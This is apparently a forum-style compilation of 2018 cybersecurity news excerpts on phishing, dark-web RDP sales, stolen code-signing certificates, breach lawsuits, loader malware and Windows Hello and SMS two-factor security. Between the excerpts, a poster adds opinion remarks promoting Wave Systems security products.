"While highly publicized data breaches often report losses in the millions, these numbers are highly variable and often focused on a few specific costs which are easily quantified," said Wendi Whitmore, Global Lead for IBM X-Force Incident Response and Intelligence Services (IRIS). "The truth is there are many hidden expenses which must be taken into account such as reputational damage, customer turnover, and operational costs."
"Knowing where the costs lie, and how to reduce them, can help companies invest their resources more strategically and lower the huge financial risks at stake," the executive added.
Hackers dangle a wide variety of phishing hooks beyond email
Wave VSC 2.0 could help protect companies' computers in the face of the phishing that is presented in this article.
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.itproportal.com/features/hackers-dangle-a-wide-variety-of-phishing-hooks-beyond-email/
Browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage
A recent report from Barracuda Networks found that 87 per cent of respondents faced an attempted email-based phishing attack in the past year, making it clear that email-based phishing continues to be a major threat vector. But what happens when improved security defences and employee awareness training make email phishing threats less likely to succeed? Well, if nothing else, hackers are smart and resourceful. They just change to phishing tactics beyond email.
Today, most security teams are finally becoming more aware of the large and growing threat of sophisticated phishing attacks that tempt employees outside of email. These new and fast-evolving attack vector targets users with increasingly sophisticated phishing attacks delivered via ads, search results, pop-ups, browser extensions, social media, chat applications, “free” web apps, and more.
Such sneaky socially engineered attacks often appear in an “arena of trust,” like a legitimate website or social media application. They deceive employees into offering up personal credentials or visiting malicious web pages that compromise their browsers and do keylogging and other malevolent actions that are hard for traditional security solutions to detect.
Hackers are preying on human fallibility with HTML-based attacks that evade existing defences by design. Disguised as legitimate web traffic, they slip through firewalls and secure web gateways. And with these new phishing campaign typically lasting just hours, existing threat-based defences can’t keep up with fast-moving attacks. In essence, browsers and browser users are the new OS that need increased protection in order to stop phishing that leads to breaches and other damage.
New types of phishing attacks are on the rise
The growing use of the Web, SaaS applications, social media, and other Internet-based resources for daily tasks is making it an increasingly appealing attack vector for hackers. While employees are on the Web or using social media, they are vulnerable to a growing variety of complex phishing attacks outside of their inbox. And with devices such as laptops and phones increasingly being dual use devices, used for both business and personal use, compromises that take place during personal time can compromise a device and help hackers gain entry into corporate networks.
Here is a brief roundup of the most common types of phishing attacks beyond email on the rise today, and why organisations should be on the alert.
Fake logins and credential stealing
It starts out looking real enough. You search for a login page for your Facebook, Google, or Dropbox account at work and come across what appears to be a legitimate page, so you enter your credentials into the phony login. This mistake makes you fair game for attackers to steal your info and get access to your critical files and passwords, and possibly even infiltrate the larger corporate network.
In the example below, attackers provide a custom Dropbox phishing page that allows users to gain access through the trusted email login source of their choice. Regardless of the selection, once the user enters his or her credentials in any of the above logins, the form will submit the stolen information through a php script of the same name as the popup htm. In each php, the attacker has written a code to send the collected information to this email address.
Malicious browser extensions and ads
According to a recent report, Google says it removed 3.2 billion ads from its platforms in 2017, nearly double the total number of “bad ads” from just a year earlier. That equates to removing about 100 ads per second.
Google also reported that cybercriminals infected more than 100,000 computers with browser extensions that stole login credentials, mined cryptocurrencies, and engaged in click fraud. The malicious extensions were hosted in Google’s official Chrome Web Store. These browser extensions and related HTML malware are often promoted via ads, search engines, and social media to trick users through increasingly sophisticated and trustworthy social engineering methods.
rest at link -
Hackers can purchase government login credentials for cheap on the dark web
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
https://www.digitaltrends.com/computing/mcafee-hackers-buy-remote-desktop-access-dark-web/
McAfee’s Advanced Threat Research team recently discovered that hackers have access to many organizations that have weak credentials when using Microsoft’s Remote Desktop component in Windows-based systems. Access to these organizations — whether it’s an airport, a hospital or the U.S. government — can be bought for little money through specific shops on the dark web.
Microsoft’s Remote Desktop Protocol (RDP) essentially allows you to connect and use a Windows-based PC from a remote location. When those login credentials are weak, hackers can use brute force attacks to gain the username and password for each connection. McAfee found connections up for sale across various RDP shops on the dark web ranging between a mere 15 to a staggering 40,000 connections.
“The advertised systems ranged from Windows XP through Windows 10,” says John Fokker, McAfee’sHead of Cyber Investigations. “Windows 2008 and 2012 Server were the most abundant systems, with around 11,000 and 6,500, respectively, for sale. Prices ranged from around $3 for a simple configuration to $19 for a high-bandwidth system that offered access with administrator rights.”
Among the list of devices, services and networks on the menu are multiple government systems on sale worldwide, including those linked to the United States. The team found connections to a variety of healthcare institutions including medical equipment shops, hospitals, and more. They even found access to security and building automation systems at a major international airport selling for a mere $10.
The problem doesn’t just revolve around desktops, laptops, and servers. Internet of Things devices based on Windows Embedded are also on the menu such as point-of-sale systems, kiosks, parking meters, thin client PCs and more. Many are overlooked and not updated, making them a quiet entryway for hackers.
Black market sellers gain RDP credentials by scanning the internet for systems that accept RDP connections, and then use tools like Hydra, NLBrute and RDP Forcer to attack the login using stolen credentials and password dictionaries. Once they successfully log into the remote PC, they don’t do anything but put the connection details up for sale.
After hackers pay for a connection, they can bring a corporation down to its knees. For instance, a hacker could pay a mere $10 for a connection, infiltrate the network to encrypt the files of every PC, and demand a $40,000 ransom. Compromised PCs can also be used to deliver spam, misdirect illegal activity and mine cryptocurrency. Access is also good for stealing personal information and company trade secrets.
“We found a newly posted Windows Server 2008 R2 Standard machine on the UAS Shop,” Fokker writes. “According to the shop details, it belonged to a city in the United States and for a mere $10 we could get administrator rights to this system. UAS Shop hides the last two octets the of the IP addresses of the systems it offers for sale and charges a small fee for the complete address.”
The solution, according to McAfee, is that organizations need to do a better job at checking all their virtual “doors and windows” so hackers can’t sneak in. Remote access should be secure and not easily exploitable.
Stolen certificates from D-Link used to sign password-stealing malware
Wave VSC 2.0 - https://www.wavesys.com/products/wave-virtual-smart-card
Wave Endpoint Monitor - https://www.wavesys.com/malware-protection
https://arstechnica.com/information-technology/2018/07/stolen-certificates-from-d-link-used-to-sign-password-stealing-malware/
This isn't the IP camera software you think it is.
Criminals recently stole code-signing certificates from router and camera maker D-Link and another Taiwanese company and used them to pass off malware that steals passwords and backdoors PCs, a researcher said Monday.
The certificates were used to cryptographically verify that legitimate software was issued by D-Link and Changing Information Technology. Microsoft Windows, Apple’s macOS, and most other operating systems rely on the cryptographic signatures produced by such certificates to help users ensure that executable files attached to emails or downloaded on websites were developed by trusted companies rather than malicious actors masquerading as those trusted companies.
Somehow, members of an advanced persistent-threat hacking group known as BlackTech obtained the certificates belonging to D-Link and Changing Information Technology, the researcher with antivirus provider Eset said in a blog post. The attackers then used the certificates to sign two pieces of malware, one a remotely controlled backdoor and the other a related password stealer. Both pieces of malware are referred to as Plead and are used in espionage campaigns against targets located in East Asia. The Japan Computer Emergency Response team recently documented the Plead malware here. AV provider Trend Micro recently wrote about BlackTech here.
“The ability to compromise several Taiwan-based technology companies and reuse their code-signing certificates in future attacks shows that this group is highly skilled and focused on that region,” Eset researcher Anton Cherepanov wrote in Monday’s post.
Don’t try this at home
In a support announcement, D-Link officials said that two separate code-signing certificates were recently misappropriated by a “highly active cyber espionage group.” The post said most D-Link customers won’t be affected by the theft, but it also suggested some people may experience errors when viewing mydlink IP cameras within Web browsers. Company engineers are in the process of releasing updated firmware to fix the errors. People using mydlink mobile applications aren’t affected.
Both D-Link and Changing Information Technology have revoked the stolen certificates. Until the D-Link firmware is issued, the company’s support announcement is advising people who want to use browsers to view their affected D-Link cameras to temporarily ignore the certificate revocation warnings. This is bad advice that could be abused by malware operators. Users should disregard it.
The best-known example of malware that abused stolen code-signing certificates was the Stuxnet worm that targeted Iran’s nuclear enrichment program almost a decade ago. The malware used legitimate certificates belonging to RealTek and JMicron which are both, like D-Link and Changing Information Technology, known technology companies based in Taiwan.
Last year, researchers published research that showed that malware signed by OS-trusted code-signing certificates was more common than most people assumed, with the first known instance occurring in 2003. Earlier this year, researchers documented several underground services that sold counterfeit signing credentials that are unique to each buyer. The thefts reported Monday are an indication misappropriated certificates remain a widely used technique for concealing malicious software.
Stolen Taiwanese Certs Used in Malware Campaign
https://www.infosecurity-magazine.com/news/stolen-taiwanese-certs-used/?utm_source=dlvr.it&utm_medium=twitter
Security researchers have discovered yet another cyber-attack campaign using stolen certificates to circumvent traditional security tools.
The tactic was being used to launch a remotely controlled backdoor dubbed Plead and a related password stealer, according to Eset senior malware researcher, Anton Cherepanov.
Plead was spotted last year being used by a group known as BlackTech to compromise targets in East Asia including Hong Kong, Japan and Taiwan, and as such could be a Beijing-backed venture.
Two certificates were used to sign the malware, one belonging to Taiwanese security company Changing Information Technology and another issued by D-Link.
“We spotted this malware campaign when our systems marked several files as suspicious. Interestingly, the flagged files were digitally signed using a valid D-Link Corporation code-signing certificate. The exact same certificate had been used to sign non-malicious D-Link software; therefore, the certificate was likely stolen,” explained Cherepanov.
After being notified of the discovery, D-Link revoked the certificate last week, he added.
However, BlackTech is still using the Changing Information Technology certificate, despite it also having been revoked last week.
Kevin Bocek, chief cybersecurity officer at Venafi, pointed out that the use of stolen certificates is not new and was in fact popularized by the Stuxnet authors.
“If you steal trusted machine identities from global technology companies, you can execute highly effective attacks that don’t raise any alarms. This is just one more demonstration of how machine identities, in this case code signing certificates, are being abused by malicious actors. There’s no doubt we’re going to see a lot more of these attacks in the future,” he added.
“Code-signing certificates are often a core component of DevOps and cloud infrastructure; and because organizations are using a lot more machine identities, these risks will only grow. In fact, researchers are already seeing a dramatic rise in the trade of stolen code-signing certificates on the dark web.”
Security Firm Sued for Failing to Detect Malware That Caused a 2009 Breach
If the cyber-insurance companies (Eg AXA) properly incentivized businesses to use superior cybersecurity with companies such as Wave Systems (wavesys.com), these types of lawsuits mentioned in the article could be avoided. imo.
https://www.bleepingcomputer.com/news/security/security-firm-sued-for-failing-to-detect-malware-that-caused-a-2009-breach/
Two insurance companies are suing a cyber-security firm to recover insurance fees paid to a customer after the security firm failed to detect malware on the client's network for months, an issue that led to one of the biggest security breaches of the 2000s. The security firms says the lawsuit is meritless.
The two insurance firms are Lexington Insurance Company and Beazley Insurance Company, and both insured Heartland Payment Systems, a leading payment processing company.
Lawsuit related to 2009 Heartland mega breach
In January 2009, Heartland announced a major security breach of its network, following which an attacker stole details for over 100 million payment cards stored on its systems by over 650 of Heartland's customers.
Following this devastating hack and one of the biggest of the 2000s, Heartland paid over $148 million in settlement fees for various lawsuits, and other remediation costs and expenses Heartland owed its customers.
As part of their insurance agreements, the two firms paid $30 million to Heartland in the hack's aftermath, with the Lexington Insurance Company footing a $20 million bill, and the Beazley Insurance Company paying another $10 million.
Lawsuit claims Trustwave failed to detect intrusion
But now, according to a civil lawsuit filed on June 28 in Illinois, and first reported by the Cook County Record, the two companies are trying to recover those costs, and are claiming that the security firm with which Heartland had a service contract had failed to honor its agreement.
The two insurance firms claim that Chicago-based Trustwave Holdings, Inc. —the security firm— had failed to detect that an attacker used an SQL injection attack to breach Heartland's systems on July 24, 2007.
Furthermore, the two say Trustwave also failed to detect that attackers installed malware on the payments processor's servers on May 14, 2008, and did not raise a sign of alarm about the event.
The lawsuit points out that Trustwave did not detect any signs of suspicious activity during its security audits it provided Heartland for almost two years as part of its contracts, which also included testing for PCI DSS compliance and attestation.
Visa report suggests Trustwave's fault
The lawsuit also mentions that in the aftermath of the hack, Visa conducted a review of Heartland's servers and found that Trustwave incorrectly certified Heartland as PCI DSS compliant. PCS DSS stands for Payment Card Industry Data Security Standard, an attestation every vendor must obtain before being allowed to handle credit card data.
The lawsuit claims that Visa discovered that Trustwave ignored the fact that Heartland didn't run a firewall, was using vendor-supplied passwords, didn't have sufficient protection for the storage system used for card data, failed to assign unique identification to each person accessing its system, and had failed to monitor servers and cardholder data at regular intervals.
All of these are PCI DSS compliance rules, and Visa said that despite all the problems on Heartland's network, Trustwave provided PCI DSS attestation. Visa later prohibited Heartland from employing Trustwave following the wrongful attestation.
Citing the Visa report and other post-breach documents, the two insurance firms claim that Trustwave is guilty of gross negligence. Furthermore, the lawsuit claims that Trustwave is also in breach of the contracts it signed with Heartland, for which it was supposed to provide security services. The two insurance firms are now asking for damages of at least $30 million, pending a jury trial, following Trustwave's failure to detect the intrusion.
Trustwave denies fault, says it's an old story
But in a statement to Bleeping Computer, Trustwave says the lawsuit is meritless.
"Trustwave filed a lawsuit in Delaware against insurers Lexington and Beazley in response to their time-barred and unwarranted attempt to recoup the insurance payments they made as coverage for a 2008 data breach at Heartland," a Trustwave spokersperson told us. "The insurers subsequently filed a duplicative suit in Illinois regarding the exact same matter."
"Trustwave provided Heartland with an assessment of its compliance with PCI DSS. However, such an assessment, as the contract at issue makes clear, in no way guarantees that the company examined has not or cannot be breached," the spokesperson added.
"Trustwave did not manage Heartland's information security, and at no time did Heartland assign blame for the breach or make any claim against Trustwave. The insurers' demand related to a decade-old breach is entirely without merit. Trustwave initiated the lawsuit in order to obtain a resolution of these baseless demands and intends to pursue this matter vigorously."
Trustwave was sued before in similar cases
This is the third time Trustwave is on the receiving end of such a lawsuit. A banking conglomerate sued Trustwave in 2014 for its role in the Target breach, but the lawsuit was dropped after a few days when it was discovered that Trustwave was not responsible for securing Target's payment card data, and hence, not at fault.
Trustwave was sued for a second time in 2016 when a casino operator claimed the security firm failed to contain and eradicate a 2013 breach of its payment system. The lawsuit claims Trustwave missed a second breach that later allowed a crook to steal over 300,000 payment card details from the casino operator's customers. This lawsuit is ongoing.
Senate Panel Announces Hearing on Computer Chip Flaws
Why not use the TPM to store sensitive data instead of having to continuously PATCH for Spectre and Meltdown? That method doesn't seem to be working and getting all new processors would take years to be absorbed into the market.
http://thehill.com/policy/cybersecurity/395878-senate-panel-announces-hearing-on-computer-chip-flaws
Netflix's Latest Price Test Could Be Bad News for Password Sharers
Wavexpress (Wave subsidiary) has closed up shop for quite some time but it is still an interesting technology in that the TPM could be a good device identifier for Netflix. imo. Steve Sprague years ago had indicated that cable was no longer being stolen due to hardware security. Maybe Netflix could license some of Wavexpress's technology given their new testing indicated in the article below.
https://www.thestreet.com/opinion/netflix-price-test-could-be-bad-news-for-password-sharers-14642914
The streaming giant is testing a pricing overhaul that would lower the number of simultaneous streams that are supported by two of its plans. That could give a lift to subscriptions and average prices.
It's an open secret that many Netflix (NFLX - Get Report) subscribers "share" their login credentials with friends and/or relatives.
If recent European tests are any sign, the streaming giant is finally thinking about cutting down on the behavior, by lowering the number of simultaneous streams supported by what are currently its two most expensive plans. And though such a move naturally risks sparking a consumer backlash, it could also provide a lift to Netflix's subscriber growth and average selling prices (ASPs) in the U.S. and some other developed markets.
Earlier this week, CordCutting.com and Italian site TuttoAndroid reported that Netflix is testing a pricing overhaul in European markets in which the company would launch an "Ultra" subscription plan that has the features of its current Premium plan, which costs €14 ($16.35) per month in a slew of European markets and $14 per month in the U.S. Like the current Premium plan, the Ultra plan lets accounts play up to four streams at the same time in either HD or (if a particular show or movie supports it) 4K resolution.
Notably, the Ultra plan is priced at €17 ($19.86) per month in the test. The Premium plan is still being offered, but only supports two simultaneous streams instead of the four that Premium subs currently enjoy. And Netflix's popular Standard plan -- which costs €11 ($12.85) or $11 per month in the U.S. and supports HD (but not 4K) streaming -- only supports one stream in the test, rather than the current two.
Users seeing the test aren't witnessing any changes to Netflix's Basic plan: It still costs €8 ($ 9.34) per month in Europe and $7.99 in the U.S. and supports one standard-definition stream.
A Netflix spokeswoman confirmed the test to CNET. "In this case, we are testing slightly different price points and features to better understand how consumers value Netflix," she said.
Clearly, if Netflix rolled out the pricing revamp on a large scale, Standard and (to some extent) Premium subs who are sharing their login credentials with other households would need to either think twice about doing so, or upgrade to a more expensive plan. And judging by both surveys and anecdotal evidence, the number of Netflix subs faced with that dilemma could be meaningful.
Last year, a U.S. Reuters survey found that 12% of adult streaming viewers admitted to "using an account/log-in information that belongs to someone outside your house." Among consumers aged 18 to 24, the figure rose to 21%. Assuming that some consumers were embarrassed to admit to such activity, Reuters's survey numbers might slightly understate how prevalent it is.
To date, Netflix has avoided cracking down on password-sharing, arguing that doing so risks snaring consumers engaged in "legitimate" sharing (for example, subscribers who share their log-ins with spouses or children). Lowering the number of streams supported by the Standard and Premium plans, though, would let the company reduce how much password-sharing occurs without engaging in a case-by-case crackdown that upsets "legitimate" sharers caught up in it.
And that, in turn, could drive an uptick in subscriptions among consumers borrowing someone else's login credentials. This could especially be a big deal in the U.S. -- both because of how common password-sharing has become here, and because high penetration rates have begun impacting its U.S. subscriber growth.
There are an estimated 126 million households in the U.S., and Netflix expects to end Q2 with 57.9 million U.S. streaming subscriptions. Exclude households that lack Internet access and/or can't afford Netflix, and the company's U.S. penetration rate is likely over 50% even before accounting for households using borrowed credentials. In addition, a December 2016 comScore survey found that 75% of U.S. Wi-Fi-connected homes subscribing to one or more over-the-top (OTT) streaming services included Netflix among them.
All of this makes it a good time for Netflix to try and coax U.S. password-borrowers to get their own subscriptions. Meanwhile, Netflix's very high customer satisfaction rates and still-reasonable pricing arguably position it well to convince households that need support for two or more simultaneous streams to keep their various Netflix-viewing members satisfied to sign up for a costlier plan.
Such upgrade activity would provide a fresh boost to Netflix's average selling price (ASP). With the help of the price hikes carried out last fall, Netflix's global ASP rose 14% annually in Q1, with 12% growth recorded in the U.S.
There is, of course, a risk that a broad rollout of Netflix's pricing overhaul in developed markets -- judging by how its latest price hike was rolled out, there's a good chance that Netflix will be more cautious in price-sensitive emerging markets -- would anger many consumers who have come to take their plan's support for two or four simultaneous streams for granted. However, with Netflix's plans remaining far cheaper than a typical pay-TV plan, and surveys indicating the company still has a fair amount of headroom to hike prices, the backlash might not be too severe.
Time will tell whether the pricing overhaul that Netflix is experimenting with in Europe becomes something more than a test. But either way, the fact that Netflix is even considering such a move speaks volumes about how confident the company remains about its pricing power and customer loyalty as Amazon.com (AMZN - Get Report) , Disney (DIS - Get Report) and others take their best shots at the streaming video giant.
PIN vs Password in Windows 10 – Which offers better security?
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
https://www.thewindowsclub.com/pin-vs-password-in-windows-10
Windows 10 introduced Windows Hello allowing users to sign in to their device using the PIN or biometric identification. It revolutionized the concept of system security, bringing it to a level that no system could be hacked remotely. However, Windows 10 also allows users to use the Password to log in. So which offers better security?
PIN vs Password in Windows 10
What is a Password?
A Password is a secret code which is stored on a server and can be used to access your account from any location, at least when speaking of computer-related accounts. Now they say that since servers have their own Firewalls which are powerful enough, these passwords cannot be hacked. However, this is untrue. A cyber-criminal doesn’t need to specifically access the server to figure out the password. Keylogging, phishing, etc. are a few of the known techniques to hack a person’s password without interfering with the server itself.
No matter how the password has been acquired, the intruder now has access to the user’s accounts from anywhere he/she chooses to access. One exception is if the user whose account was compromised was using a company based login where the information is stored in an active directory. In such a case, the hacker would have to access the original user’s account through any other system which is on the same network, which is difficult, though still possible.
Here’s where the concept of the PIN and biometric identification come to use. Windows Hello PIN and biometric identification are system specific. They are not stored on any server. While these logon types are not a substitute for a password, they are seemingly unhackable unless the cyber-criminal steals the device itself.
What is a PIN?
A PIN is an easy secret login code to login to your device. It is usually a set of number (mostly 4-digits), though some companies might allow their employees to use PINs with letters and special characters.
A PIN is tied to the device
A PIN is not stored on any server and is device specific. This means that if someone finds out your system’s PIN, the intruder would be able to get nothing out of it unless he/she steals the device as well. The PIN cannot be used on any other device belonging to the same person.
A PIN is backed up by TPM hardware
A Trusted Platform Module (TPM) is a hardware chip that has special security mechanisms to make it tamper proof. It has been made such that no known software attacks can hack it. Eg. PIN-brute force won’t work since the TPM gets locked.
How PIN backed up with TPM works if someone steals your laptop?
Ideally, it would be an extremely rare case that a cybercriminal is able to steal your laptop and spoof its PIN, but well, considering that it’s possible, TPM uses anti-hammering mechanism to block the PIN after repeated wrong attempts. If your device does not have TPM, you can use BitLocker to limit the number of failed sign in attempts, using the Group Policy Editor.
Why do users need to set a PIN before using biometric identification?
Be it a fingerprint, the retina of the eye or speech, injury on the body part used for biometric identification might lead to your device getting locked. Since people have a habit of not setting PINs unless forced to, Microsoft made it mandatory to set one before creating biometric identification.
Which is better among PIN and Password?
Honestly, this is a question that cannot be answered straight away. A PIN cannot be used for single sign-on structures like a password. A password is insecure and even known attacks like phishing and keylogging cannot protect systems if the password is hacked. Usually, servers offer extra protection like 2-step authentication and IT departments in companies help change the password or block accounts the second they figure out that the password has been compromised. So the choice is yours – but generally speaking, a PIN does offer more security.
This password-stealing malware just added a new way to infect your PC
See Wave VSC 2.0 at wavesys.com for a product that could help this situation in a BIG WAY. imo. Wave Endpoint Monitor (see wavesys.com as well) could also have a positive impact on this situation.
https://www.zdnet.com/article/this-password-stealing-malware-just-added-a-new-way-to-infect-your-pc/
One of the new tactics by the malware involves an injection technique not seen in the wild until just days ago
A powerful form of malware which can be used to distribute threats including Trojans, ransomware and malicious cryptocurrency mining software has been updated with a new technique which has rarely been seen in the wild.
Distributed in spam email phishing campaigns, Smoke Loader has been sporadically active since 2011 but has continually evolved. The malware has been particularly busy throughout 2018, with campaigns including the distribution of Smoke Loader via fake patches for the Meltdown and Spectre vulnerabilities which emerged earlier this year.
Like many malware campaigns, the initial attack is conducted via a malicious Microsoft Word attachment which tricks users into allowing macros, enabling Smoke Loader to be installed on the compromised system and allowing the Trojan to deliver additional malicious software.
Researchers at Cisco Talos have been tracking Smoke Loader for some time and have seen its latest campaigns in action. One of the current preferred payloads is TrickBot -- a banking Trojan designed to steal credentials, passwords and other sensitive information. Phishing emails distributing the malware are designed to look like invoice requests from a software firm.
What intrigued researchers is how Smoke Loader is now using an injection technique which hadn't been used to distribute malware until just days ago. The code injection technique is known as PROPagate and was first described as a potential means of compromise late last year.
This technique abuses the SetWindowsSubclass function -- a process used to install or update subclass windows running on the system -- and can be used to modify the properties of windows running in the same session. This can be used to inject code and drop files while also hiding the fact it has happened, making it a useful, stealthy attack.
It's likely that the attackers have observed publically available posts on PROPagate in order to recreate the technique for their own malicious ends.
Those behind this process have also added anti-analysis techniques to complicate forensics, runtime AV scanners, tracing, and debugging that any researchers may attempt to conduct on the malware.
While there's still plenty of Smoke Loader attacks which look to deliver additional malware to compromised systems, in some cases the malware is being equipped with its own plug-ins to go straight onto performing its own malicious tasks.
Each of these plugins are designed to steal sensitive information, specifically stored credentials or sensitive information transferred over a browser -- the likes of Firefox, Internet Explorer, Chrome, Opera, QQ Browser, Outlook, and Thunderbird can all be used to steal data.
The malware can even be injected into applications like TeamViewer, potentially putting the credentials of others on the same network as the infected machine at risk too.
It's possible that Smoke Loader has been equipped with these tasks because its operators aren't currently getting much business in response to adverts on dark web forums advertising their ability to install other types of malware onto their compromised network of machines. It could also just be a means of taking advantage of the botnet for their own purposes.
Either way, it indicates that organisations must remain vigilant against potential threats.
"We have seen that the trojan and botnet market is constantly undergoing changes. The players are continuously improving their quality and techniques. They modify these techniques on an ongoing basis to enhance their capabilities to bypass security tools. This clearly shows how important it is to make sure all our systems are up to date," wrote Cisco Talos researchers.
"We strongly encourage users and organizations to follow recommended security practices, such as installing security patches as they become available, exercising caution when receiving messages from unknown third parties, and ensuring that a robust offline backup solution is in place. These practices will help reduce the threat of a compromise, and should aid in the recovery of any such attack," they added.
UK CEOs believe cyber attacks are inevitable
A better, cost effective and unique set of cybersecurity products could prevent these cyber attacks from happening: see wavesys.com imo.
http://www.itpro.co.uk/security/31431/uk-ceos-believe-cyber-attacks-are-inevitable
KPMG survey finds that four in ten UK company bosses believe they will be targeted by cyber criminals
Four in ten UK CEOs believe it's no longer a case of "if" a cyber attack will happen as it is now an inevitability, according to research from KPMG.
The professional services firm surveyed 150 UK leaders and a further 1,150 CEOs from around the world about their future investment plans and the challenges facing their companies.
The results showed that 39% of UK CEOs believed that they will be targeted by a cyber attack. The percentage was higher globally, with almost half of international CEOs feeling the same way.
Bernard Brown, vice chair at KPMG in the UK, said that the findings show how high up the agenda cybersecurity has become for businesses.
"The seeming inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for the board-level discussions," he said.
"Protecting the business from a cyber attack has jumped further up the boardroom agenda and we are seeing businesses making their defences the best they can be."
The survey found that UK business leaders believe that a strong cybersecurity strategy is critical to engendering trust with key stakeholders, with 74% agreeing that cybersecurity is an enabler of trust, compared to 55% of global CEOs.
According to the report, cyber awareness amongst UK leaders is changing, with 39% believing that their organisations are either "very well" or "well" prepared for a future cyber attack.
CEOs also believe that cybersecurity specialists are an effective part of the business with 45% of UK CEOs seeing their value, coming second to data scientists who are seen as being effective by 62% of the CEOs asked.
"It's encouraging to see that CEOs are developing a more mature understanding of what cyber security actually means. They are beginning to ask more awkward and searching questions of their IT teams. What are the challenges that face us specifically, what risks are we carrying, what do we need to be resilient to a cyber-attack?" Brown added.
"Organisations are spending more time planning for worst case scenarios, running simulations and thinking in detail about how they would deal with the uncertainties that arise during a cyber breach."
More and more companies are becoming victims to cybercrime, in recent weeks sports brand and trainer maker Adidas suffered a data breach and could have potentially exposed the personal details of millions of its customers.
‘Couldn’t recognize that fingerprint’ Windows Hello error
There seems to be a lot of time consuming work arounds on the Windows Hello fingerprint reader technology. Seems like Wave VSC 2.0 would have had the kinks like these already worked out. Windows Hello and Wave VSC 2.0 are somewhat similar technologies.
full article at the link.
https://windowsreport.com/fix-couldnt-recognize-fingerprint/
Excerpts:
With the introduction of Windows Hello, Microsoft added a few extra security layers with a few versatile biometric options. The fingerprint scanner is commonly used, and it’s held in high regards when it comes to its security value (look at all those smartphones). Once established, you’ll be able to go past the lock screen with just a touch. However, it seems that the fingerprint recognition failed for some users and they were acquainted with the “Couldn’t recognize that fingerprint” error.
And it hardly works with the same success with other OEMs. Thus, Microsoft Hello and the accompanying sign in options display lots of bugs on Lenovo and Dell laptops. And, for that reason, you’ probably need to re-establish the fingerprint sign-in profile more times than you would like.
2: Use Local account and update Windows
The same reason. If Windows 10 update broke your fingerprint reader and it gives you the “Couldn’t recognize that fingerprint” error, you might look for alternatives. Lots of affected users managed to address the problem but, in exchange, they were able to use the fingerprint only on Local account instead of the Microsoft account.
4.Follow the instructions.
With that, we can conclude this article. We can only hope that these steps helped you resolve the “Couldn’t recognize that fingerprint” error in Windows Hello sign-in. If there is some additional information you consider useful, feel free to share it with us. The comments section is just below.
Two-Factor Inauthentication – The Rise In SMS Phishing Attacks
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/sites/wave/files/Wave%20Systems_Smart%20Card%202.0.pdf
https://www.informationsecuritybuzz.com/articles/two-factor-inauthentication-the-rise-in-sms-phishing-attacks/
There are countless ways to carry out a cyber attack, but for the vast majority the key is deception – typically involving identity deception in which the attacker poses as a trusted party to the intended victim.
With cyber criminals constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and companies. While various 2FA methods are available, the humble SMS text message has emerged as a favourite as it is incredibly ubiquitous and easy to understand.
Nevertheless, SMS also contains a number of inherent flaws as a security verification method. The first problem is that 2FA doesn’t actually verify the user’s identity, only that they have access. This means that anyone with direct access to the device can pass through 2FA security measures as they can send themselves the code.
The SMS phishing menace
Thieves and fraudsters don’t need to have the device in their hands, as 2FA is also vulnerable to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS and targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset their password for a particular user. Immediately afterwards, they send a fake text message to the same user, pretending to be the service provider and asking for the code “as an additional verification measure”.
In a research experiment I conducted with colleagues at New York University, we discovered that the VCFA technique can be incredibly effective – far more so than comparable email-based phishing attacks. We enlisted more than 300 volunteers who were not aware that the experiment involved SMS phishing, and sent them a variety of different messages designed after real SMS from their email provider. The most successful message was able to fool 50 percent of recipients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non-targeted email-based phishing attacks have a success rate of around 1 per cent, with the very best reaching two or three percent.
Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else connected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known as Email Account Compromise (EAC). While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used in much more subtle and insidious ways.
EAC emails are far more difficult to detect than normal fraudulent messages, as they lack potential tells such as mismatched sender IDs. The good news is that they are not entirely unstoppable, and it is possible to detect and prevent an EAC email by looking even deeper into different elements associated with the identity of the legitimate user. For example, an email security system could be set up to detect details about the user agent – the device used to send the email. So, a user could normally use a Mac with a 2560 × 1600 screen resolution, while the imposter who has hijacked their account might use a PC with an 1440 x 900 resolution.
This difference can be identified through the email itself, along with other signs such as the IP address. Taken together, these clues can point to a suspicious email even when then account address is genuine. The email can then be flagged for further examination to determine if there really is a malicious actor at work, or if the CEO happens to be using his or her spouse’s PC for the afternoon.
Can 2FA be saved?
The most obvious solution to the many security flaws in SMS 2FA is to abandon the text message as a verification measure – something I expect to see happening with increasing frequency over the next year.
Although SMS 2FA is certainly on the way out, it will be some time before the change filters through all organisations thanks to its simplicity and popularity. While SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organisations to be aware that their workforce’s digital identities may be compromised. Enterprises must be prepared for the threat of an employee’s email being hijacked via 2FA and used to attack them from within.